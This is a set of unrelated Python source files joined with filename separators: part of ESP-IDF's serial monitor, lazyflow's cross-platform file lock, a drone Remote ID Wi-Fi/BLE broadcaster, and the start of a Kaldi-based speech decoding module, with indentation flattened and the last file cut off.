if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
        # of the line. But after some time, when we haven't received it, we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_L: # Toggle saving output into file
self.toggle_logging()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
            # quickly trigger the pause without pressing the menu key again
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {log:7} Toggle saving output into file
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P))
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [CTRL_F, CTRL_A]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
                    # don't fill up the screen with the previous errors (subsequent prints would probably fail too)
self.stop_logging()
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
filelock.py
|
###############################################################################
# lazyflow: data flow based lazy parallel computation framework
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the Lesser GNU General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# See the files LICENSE.lgpl2 and LICENSE.lgpl3 for full text of the
# GNU Lesser General Public License version 2.1 and 3 respectively.
# This information is also available on the ilastik web site at:
# http://ilastik.org/license/
###############################################################################
"""
Implementation of a simple cross-platform file locking mechanism.
This is a modified version of code retrieved on 2013-01-01 from
http://www.evanfosmark.com/2009/01/cross-platform-file-locking-support-in-python.
(The original code was released under the BSD License. See below for details.)
Modifications in this version:
- Tweak docstrings for sphinx.
- Accept an absolute path for the protected file (instead of a file name relative to cwd).
- Allow timeout to be None.
- Fixed a bug that caused the original code to be NON-threadsafe when the same FileLock instance was shared by multiple threads in one process.
(The original was safe for multiple processes, but not multiple threads in a single process. This version is safe for both cases.)
- Added ``purge()`` function.
- Added ``available()`` function.
- Expanded API to mimic ``threading.Lock interface``:
- ``__enter__`` always calls ``acquire()``, and therefore blocks if ``acquire()`` was called previously.
- ``__exit__`` always calls ``release()``. It is therefore a bug to call ``release()`` from within a context manager.
- Added ``locked()`` function.
- Added blocking parameter to ``acquire()`` method
WARNINGS:
- The locking mechanism used here may need to be changed to support old NFS filesystems:
http://lwn.net/Articles/251004
(Newer versions of NFS should be okay, e.g. NFSv3 with Linux kernel 2.6. Check the open(2) man page for details about O_EXCL.)
- This code has not been thoroughly tested on Windows, and there has been one report of incorrect results on Windows XP and Windows 7.
The locking mechanism used in this class should (in theory) be cross-platform, but use at your own risk.
ORIGINAL LICENSE:
The original code did not properly include license text.
(It merely said "License: BSD".)
Therefore, we'll attach the following generic BSD License terms to this file.
Those who extract this file from the lazyflow code base (LGPL) for their own use
are therefore bound by the terms of both the Simplified BSD License below AND the LGPL.
Copyright (c) 2013, Evan Fosmark and others.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
"""
from __future__ import print_function
from builtins import range
from builtins import object
import os
import sys
import time
import errno
class FileLock(object):
""" A file locking mechanism that has context-manager support so
    you can use it in a ``with`` statement. This should be relatively cross-platform
    compatible as it doesn't rely on ``msvcrt`` or ``fcntl`` for the locking.
"""
class FileLockException(Exception):
pass
def __init__(self, protected_file_path, timeout=None, delay=1, lock_file_contents=None):
""" Prepare the file locker. Specify the file to lock and optionally
the maximum timeout and the delay between each attempt to lock.
"""
self.is_locked = False
self.lockfile = protected_file_path + ".lock"
self.timeout = timeout
self.delay = delay
self._lock_file_contents = lock_file_contents
if self._lock_file_contents is None:
self._lock_file_contents = "Owning process args:\n"
for arg in sys.argv:
self._lock_file_contents += arg + "\n"
def locked(self):
"""
Returns True iff the file is owned by THIS FileLock instance.
(Even if this returns false, the file could be owned by another FileLock instance, possibly in a different thread or process).
"""
return self.is_locked
def available(self):
"""
Returns True iff the file is currently available to be locked.
"""
return not os.path.exists(self.lockfile)
def acquire(self, blocking=True):
""" Acquire the lock, if possible. If the lock is in use, and `blocking` is False, return False.
Otherwise, check again every `self.delay` seconds until it either gets the lock or
exceeds `timeout` number of seconds, in which case it raises an exception.
"""
start_time = time.time()
while True:
try:
# Attempt to create the lockfile.
# These flags cause os.open to raise an OSError if the file already exists.
fd = os.open(self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
with os.fdopen(fd, "a") as f:
# Print some info about the current process as debug info for anyone who bothers to look.
f.write(self._lock_file_contents)
break
except OSError as e:
if e.errno != errno.EEXIST:
raise
if self.timeout is not None and (time.time() - start_time) >= self.timeout:
                    raise FileLock.FileLockException("Timeout occurred. You may need to purge the `.lock` file manually"
                                                     " using the option `--purge` with `manager.py`. Removing the .lock"
                                                     " may break ongoing transactions.")
if not blocking:
return False
time.sleep(self.delay)
self.is_locked = True
return True
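    # Non-blocking usage sketch (the protected path is illustrative):
    #
    #     lock = FileLock("/tmp/somefile.txt", timeout=5)
    #     if lock.acquire(blocking=False):
    #         try:
    #             ...  # work on the protected file
    #         finally:
    #             lock.release()
    #     else:
    #         ...  # someone else holds the lock; try again later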
def release(self):
""" Get rid of the lock by deleting the lockfile.
When working in a `with` statement, this gets automatically
called at the end.
"""
self.is_locked = False
os.unlink(self.lockfile)
def __enter__(self):
""" Activated when used in the with statement.
Should automatically acquire a lock to be used in the with block.
"""
self.acquire()
return self
def __exit__(self, type, value, traceback):
""" Activated at the end of the with statement.
            It automatically releases the lock.
"""
self.release()
def __del__(self):
""" Make sure this ``FileLock`` instance doesn't leave a .lock file
lying around.
"""
if self.is_locked:
self.release()
def purge(self):
"""
For debug purposes only. Removes the lock file from the hard disk.
"""
if os.path.exists(self.lockfile):
self.release()
return True
return False
if __name__ == "__main__":
import sys
import functools
import threading
import tempfile
temp_dir = tempfile.mkdtemp()
protected_filepath = os.path.join(temp_dir, "somefile.txt")
print("Protecting file: {}".format(protected_filepath))
fl = FileLock(protected_filepath)
def writeLines(line, repeat=10):
with fl:
for _ in range(repeat):
with open(protected_filepath, "a") as f:
f.write(line + "\n")
f.flush()
th1 = threading.Thread(target=functools.partial(writeLines, "1111111111111111111111111111111"))
th2 = threading.Thread(target=functools.partial(writeLines, "2222222222222222222222222222222"))
th3 = threading.Thread(target=functools.partial(writeLines, "3333333333333333333333333333333"))
th4 = threading.Thread(target=functools.partial(writeLines, "4444444444444444444444444444444"))
th1.start()
th2.start()
th3.start()
th4.start()
th1.join()
th2.join()
th3.join()
th4.join()
assert not os.path.exists(fl.lockfile), "The lock file wasn't cleaned up!"
# Print the contents of the file.
# Please manually inspect the output. Does it look like the operations were atomic?
with open(protected_filepath, "r") as f:
sys.stdout.write(f.read())
|
remote_droneID.py
|
import subprocess
from time import sleep
from threading import Thread
import yaml
class DRI:
# ROS node to convert to hex format
# <element id><len><oui><vendor ie>
# standards-oui.ieee.org/oui/oui.txt
# QC OUI: 88-12-4E or 00-A0-C6 or 64-9c-81 ...
# BRCM OUI: BC-97-E1 or 00-1B-E9 or 00-05-B5 ...
#
def __init__(self):
self.bt_if = ""
self.dri_if = ""
self.obs_if = ""
        print('> Loading yaml conf... ')
        with open("dri.conf", 'r') as conf_file:
            self._conf = yaml.safe_load(conf_file)
self.debug = self._conf['debug']
self.dri_update_int = self._conf['dri_ie_update_interval']
self.dri_data_file = self._conf['dri_file_name']
self.tx_mode = self._conf['mode']
self.dri_role = self._conf['dri_role']
@staticmethod
def prepare_vendor_ie(drone_id):
length = len(drone_id)
# Add custom OUI
oui = "bbddcc"
# 3 byte for OUI
length = length / 2 + 3
len_tag = format(int(length), '#04x')[2:]
vendor_ie = "dd" + len_tag + oui + drone_id
return vendor_ie
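    # Worked example of the layout built above (the drone_id hex string is purely
    # illustrative): prepare_vendor_ie("0102") returns "dd05bbddcc0102" --
    # element id 0xdd, length 0x05 (3-byte OUI + 2 payload bytes), the custom
    # OUI bbddcc, then the payload bytes.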
@staticmethod
def update_vendor_ie(drone_id):
cmds = ["hostapd_cli SET vendor_elements " + str(drone_id),
"hostapd_cli DISABLE",
"hostapd_cli ENABLE"]
for cmd in cmds:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
@staticmethod
def prepare_ble_dri_uuid(drone_id):
return ' '.join([drone_id[i:i + 2] for i in range(0, len(drone_id), 2)])
    def ble_dri_tx(self, drone_id):
# allow rfkill to bring up bluetooth hci interface
cmd = "rfkill unblock bluetooth"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
# bring up bluetooth interface.
# To do: use bluez python lib
cmd = "hciconfig " + str(self.bt_if) + " up"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
# enable ble advertising, To do: dynamically detect connection vs connectionless adv
cmd = "hciconfig " + str(self.bt_if) + " leadv 3"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
sd = self.prepare_ble_dri_uuid(drone_id)
# To do: generate dynamic UUID and remove hardcoded tx power(get from conf)
cmd = "hcitool -i " + str(self.bt_if) + " cmd 0x08 0x0008 1E 02 01 1A 1A FF 4C 00 02 15 " +\
str(sd) + " 00 00 00 00 " + "C5 00"
print(cmd)
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
    def get_wifi_beacon_list(self):
cmd = "iw wlan0 scan -u | grep 'SSID\|Vendor specific'"
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
dri_oui_list = proc.communicate()[0].decode('utf-8').strip()
if self.debug:
print(f"{dri_oui_list=}")
def dri_thread(self):
while True:
f = open(self.dri_data_file, 'r')
dri_data = f.read()
if self.debug:
print(f"{dri_data=}")
f.close()
if self.tx_mode == 'wifi':
beacon_vendor_ie = self.prepare_vendor_ie(dri_data)
if self.debug:
print(f"{beacon_vendor_ie=}")
self.update_vendor_ie(beacon_vendor_ie)
elif self.tx_mode == 'bt':
self.ble_dri_tx(dri_data)
sleep(self.dri_update_int)
def observer_thread(self):
while True:
if self.tx_mode == 'wifi':
                self.get_wifi_beacon_list()
sleep(self.dri_update_int)
def run(self):
if self.dri_role == "uav":
if self.tx_mode == 'wifi':
self.dri_if = self._conf['dri_if']
elif self.tx_mode == 'bt':
self.bt_if = self._conf['bt_if_name']
Thread(target=self.dri_thread).start()
elif self.dri_role == "observer":
self.obs_if = self._conf['obs_if']
Thread(target=self.observer_thread).start()
if __name__ == '__main__':
drone_device_id = DRI()
drone_device_id.run()
|
decode.py
|
# coding=utf-8
#
# Yu Wang (University of Yamanashi)
# Apr, 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import threading
import time
import subprocess
import os
import queue
from exkaldirt.base import info, mark, is_endpoint, print_
from exkaldirt.base import Component, PIPE, Packet, ContextManager, Endpoint
from exkaldirt.utils import encode_vector_temp
from exkaldirt.feature import apply_floor
#from base import info, mark
#from base import Component, PIPE, Packet, ContextManager
#from utils import encode_vector_temp
#from feature import apply_floor
#from base import Endpoint, is_endpoint, print_
def softmax(data,axis=1):
assert isinstance(data,np.ndarray)
if len(data.shape) == 1:
axis = 0
else:
assert 0 <= axis < len(data.shape)
maxValue = data.max(axis,keepdims=True)
dataNor = data - maxValue
dataExp = np.exp(dataNor)
dataExpSum = np.sum(dataExp,axis,keepdims=True)
return dataExp / dataExpSum
def log_softmax(data,axis=1):
assert isinstance(data,np.ndarray)
if len(data.shape) == 1:
axis = 0
else:
assert 0 <= axis < len(data.shape)
dataShape = list(data.shape)
dataShape[axis] = 1
maxValue = data.max(axis,keepdims=True)
dataNor = data - maxValue
dataExp = np.exp(dataNor)
dataExpSum = np.sum(dataExp,axis)
dataExpSumLog = np.log(dataExpSum) + maxValue.reshape(dataExpSum.shape)
return data - dataExpSumLog.reshape(dataShape)
def load_symbol_table(filePath):
assert os.path.isfile(filePath)
table = {}
with open(filePath,"r") as fr:
lines = fr.readlines()
for line in lines:
w2i = line.strip().split()
assert len(w2i) == 2
ID = w2i[1] #int(w2i[1])
table[ID] = w2i[0]
return table
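# Note on the expected symbol-table format (an assumption based on how the table is
# used below): one "<word> <id>" pair per line, as in Kaldi's words.txt, so a file
# containing "<eps> 0" and "hello 1" yields {"0": "<eps>", "1": "hello"}.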
def get_pdf_dim(hmmFile):
assert os.path.isfile(hmmFile), f"No such file: {hmmFile}."
cmd = f"hmm-info {hmmFile} | grep pdfs"
p = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out,err = p.communicate()
if p.returncode != 0:
raise Exception("Failed to get hmm info:\n" + err.decode())
else:
return int(out.decode().strip().split()[-1])
class AcousticEstimator(Component):
def __init__(self,func,leftContext=0,rightContext=0,applySoftmax=False,applyLog=True,
priors=None,oKey="data",name=None):
super().__init__(name=name)
assert isinstance(applySoftmax,bool), "<applySoftmax> must be a bool value."
assert isinstance(applyLog,bool), "<applyLog> must be a bool value."
if priors is not None:
      assert isinstance(priors,np.ndarray) and len(priors.shape)==1, "<priors> must be a 1-d array."
self.__priors = priors
self.__applyLog = applyLog
self.__applySoftmax = applySoftmax
# The acoustic function
assert callable(func)
self.acoustic_function = func
self.__memoryCache = None
assert isinstance(leftContext,int) and leftContext >= 0
assert isinstance(rightContext,int) and rightContext >= 0
if leftContext > 0 or rightContext > 0:
self.__context = ContextManager(left=leftContext,right=rightContext)
else:
self.__context = None
def get_memory(self):
return self.__memoryCache
def set_memory(self,data):
self.__memoryCache = data
def core_loop(self):
lastPacket = None
self.__firstComputing = True
while True:
action = self.decide_action()
#print( "debug action:", action )
if action is True:
packet = self.get_packet()
if not packet.is_empty():
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
if self.__context is not None:
newMat = self.__context.wrap( mat )
if newMat is None:
lastPacket = packet
else:
probs = self.__compute_and_postprocess(newMat, mat.shape[0])
if lastPacket is None:
packet.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
else:
lastPacket.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
lastPacket = packet
else:
probs = self.__compute_and_postprocess(mat, mat.shape[0])
packet.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( packet )
if is_endpoint(packet):
if lastPacket is not None:
iKey = lastPacket.mainKey if self.iKey is None else self.iKey
mat = np.zeros_like(lastPacket[iKey])
newMat = self.__context.wrap( mat )
probs = self.__compute_and_postprocess(newMat, mat.shape[0])
lastPacket.add( self.oKey[0], probs, asMainKey=True )
self.put_packet( lastPacket )
if packet.is_empty():
self.put_packet( packet )
else:
break
def __compute_and_postprocess(self,mat,frames):
probs = self.acoustic_function( mat )
assert isinstance(probs,np.ndarray) and len(probs.shape) == 2
if len(probs) != frames and self.__firstComputing:
print_( f"{self.name}: Warning! The number of frames has changed, {frames} -> {len(probs)}. Please make sure this is indeed the result you want." )
self.__firstComputing = False
# Post-process
## Softmax
if self.__applySoftmax:
probs = softmax(probs,axis=1)
## Log
if self.__applyLog:
probs = apply_floor(probs)
probs = np.log(probs)
## Normalize with priors
    if self.__priors is not None:
assert probs.shape[-1] == len(self.__priors), "priors dimension does not match the output of acoustic function."
probs -= self.__priors
return probs
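# A minimal construction sketch (the acoustic function below is a stand-in; a real
# pipeline would wrap a trained network that returns per-frame scores with one
# column per pdf).
def _example_acoustic_estimator():
  def fake_acoustic_function(mat):
    # produce a dummy (frames x 10) score matrix from the input features
    return np.tile(mat.sum(axis=1, keepdims=True), (1, 10))
  return AcousticEstimator(fake_acoustic_function, applySoftmax=True, applyLog=True)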
class WfstDecoder(Component):
def __init__(self,symbolTable,silencePhones,frameShiftSec,tmodel,graph,
wordBoundary=None,nBests=10,beam=16.0,maxActive=7000,minActive=200,
latticeBeam=10.0,pruneInterval=25,
beamDelta=0.5,hashRatio=2.0,pruneScale=0.1,
acousticScale=0.1,lmScale=1,allowPartial=False,
minDuration=0.1,oKey="data",maxBatchSize=100,name=None):
super().__init__(oKey=oKey,name=name)
self.__i2wLexicon = load_symbol_table(symbolTable)
assert isinstance(silencePhones,str) # check the format
assert isinstance(frameShiftSec,float) and frameShiftSec > 0, "<frameShiftSec> must be a positive float value."
assert os.path.isfile(tmodel), "<tmodel> should be a file path."
assert os.path.isfile(graph), "<graph> should be a file path."
if wordBoundary is not None:
assert os.path.isfile(wordBoundary), "<wordBoundary> should be a file path."
assert isinstance(nBests,int) and nBests > 1, "<nBests> must be an int value and greater than 1."
assert isinstance(beam,(int,float)) and beam > 0, "<beam> must be a positive float value."
assert isinstance(maxActive,int) and maxActive > 0, "<maxActive> must be a positive int value."
assert isinstance(minActive,int) and minActive > 0, "<minActive> must be a positive int value."
assert maxActive > minActive
